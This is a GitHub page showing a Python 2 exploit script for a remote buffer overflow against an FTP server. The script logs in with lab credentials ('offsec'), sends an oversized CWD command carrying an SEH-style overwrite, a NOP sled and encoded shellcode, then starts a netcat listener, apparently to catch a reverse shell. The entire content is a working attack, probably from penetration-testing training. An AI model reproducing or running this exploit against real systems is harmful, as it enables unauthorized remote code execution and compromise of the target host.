Permalink
Switch branches/tags
Nothing to show
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
66 lines (59 sloc) 2.55 KB
#!/usr/bin/python
import sys
import socket
import struct
import subprocess
rhost = '192.168.1.100'
shellcode = ""
shellcode += "\xda\xde\xba\x14\x94\xe3\x10\xd9\x74\x24\xf4\x5d"
shellcode += "\x31\xc9\xb1\x52\x83\xed\xfc\x31\x55\x13\x03\x41"
shellcode += "\x87\x01\xe5\x95\x4f\x47\x06\x65\x90\x28\x8e\x80"
shellcode += "\xa1\x68\xf4\xc1\x92\x58\x7e\x87\x1e\x12\xd2\x33"
shellcode += "\x94\x56\xfb\x34\x1d\xdc\xdd\x7b\x9e\x4d\x1d\x1a"
shellcode += "\x1c\x8c\x72\xfc\x1d\x5f\x87\xfd\x5a\x82\x6a\xaf"
shellcode += "\x33\xc8\xd9\x5f\x37\x84\xe1\xd4\x0b\x08\x62\x09"
shellcode += "\xdb\x2b\x43\x9c\x57\x72\x43\x1f\xbb\x0e\xca\x07"
shellcode += "\xd8\x2b\x84\xbc\x2a\xc7\x17\x14\x63\x28\xbb\x59"
shellcode += "\x4b\xdb\xc5\x9e\x6c\x04\xb0\xd6\x8e\xb9\xc3\x2d"
shellcode += "\xec\x65\x41\xb5\x56\xed\xf1\x11\x66\x22\x67\xd2"
shellcode += "\x64\x8f\xe3\xbc\x68\x0e\x27\xb7\x95\x9b\xc6\x17"
shellcode += "\x1c\xdf\xec\xb3\x44\xbb\x8d\xe2\x20\x6a\xb1\xf4"
shellcode += "\x8a\xd3\x17\x7f\x26\x07\x2a\x22\x2f\xe4\x07\xdc"
shellcode += "\xaf\x62\x1f\xaf\x9d\x2d\x8b\x27\xae\xa6\x15\xb0"
shellcode += "\xd1\x9c\xe2\x2e\x2c\x1f\x13\x67\xeb\x4b\x43\x1f"
shellcode += "\xda\xf3\x08\xdf\xe3\x21\x9e\x8f\x4b\x9a\x5f\x7f"
shellcode += "\x2c\x4a\x08\x95\xa3\xb5\x28\x96\x69\xde\xc3\x6d"
shellcode += "\xfa\x21\xbb\x6c\x92\xc9\xbe\x6e\x7c\x3c\x36\x88"
shellcode += "\xea\x50\x1e\x03\x83\xc9\x3b\xdf\x32\x15\x96\x9a"
shellcode += "\x75\x9d\x15\x5b\x3b\x56\x53\x4f\xac\x96\x2e\x2d"
shellcode += "\x7b\xa8\x84\x59\xe7\x3b\x43\x99\x6e\x20\xdc\xce"
shellcode += "\x27\x96\x15\x9a\xd5\x81\x8f\xb8\x27\x57\xf7\x78"
shellcode += "\xfc\xa4\xf6\x81\x71\x90\xdc\x91\x4f\x19\x59\xc5"
shellcode += "\x1f\x4c\x37\xb3\xd9\x26\xf9\x6d\xb0\x95\x53\xf9"
shellcode += "\x45\xd6\x63\x7f\x4a\x33\x12\x9f\xfb\xea\x63\xa0"
shellcode += "\x34\x7b\x64\xd9\x28\x1b\x8b\x30\xe9\x2b\xc6\x18"
shellcode += "\x58\xa4\x8f\xc9\xd8\xa9\x2f\x24\x1e\xd4\xb3\xcc"
shellcode += "\xdf\x23\xab\xa5\xda\x68\x6b\x56\x97\xe1\x1e\x58"
shellcode += "\x04\x01\x0b"
exploit = ''
exploit += '\x41' * 1037
exploit += struct.pack('<L', 0x06eb9090)
exploit += struct.pack('<L', 0x1220401e)
exploit += '\x90' * 32
exploit += shellcode
exploit += '\xcc' * (2000 - len(shellcode))
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((rhost, 21))
s.recv(2048)
s.send('USER offsec\r\n')
s.recv(2048)
s.send('PASS offsec\r\n')
s.recv(2048)
s.send('CWD {}\r\n'.format(exploit))
s.close()
print 'Evil buffer sent!'
subprocess.call(['nc -lvvp 7734'], shell=True)
except Exception as error:
print error
sys.exit(1)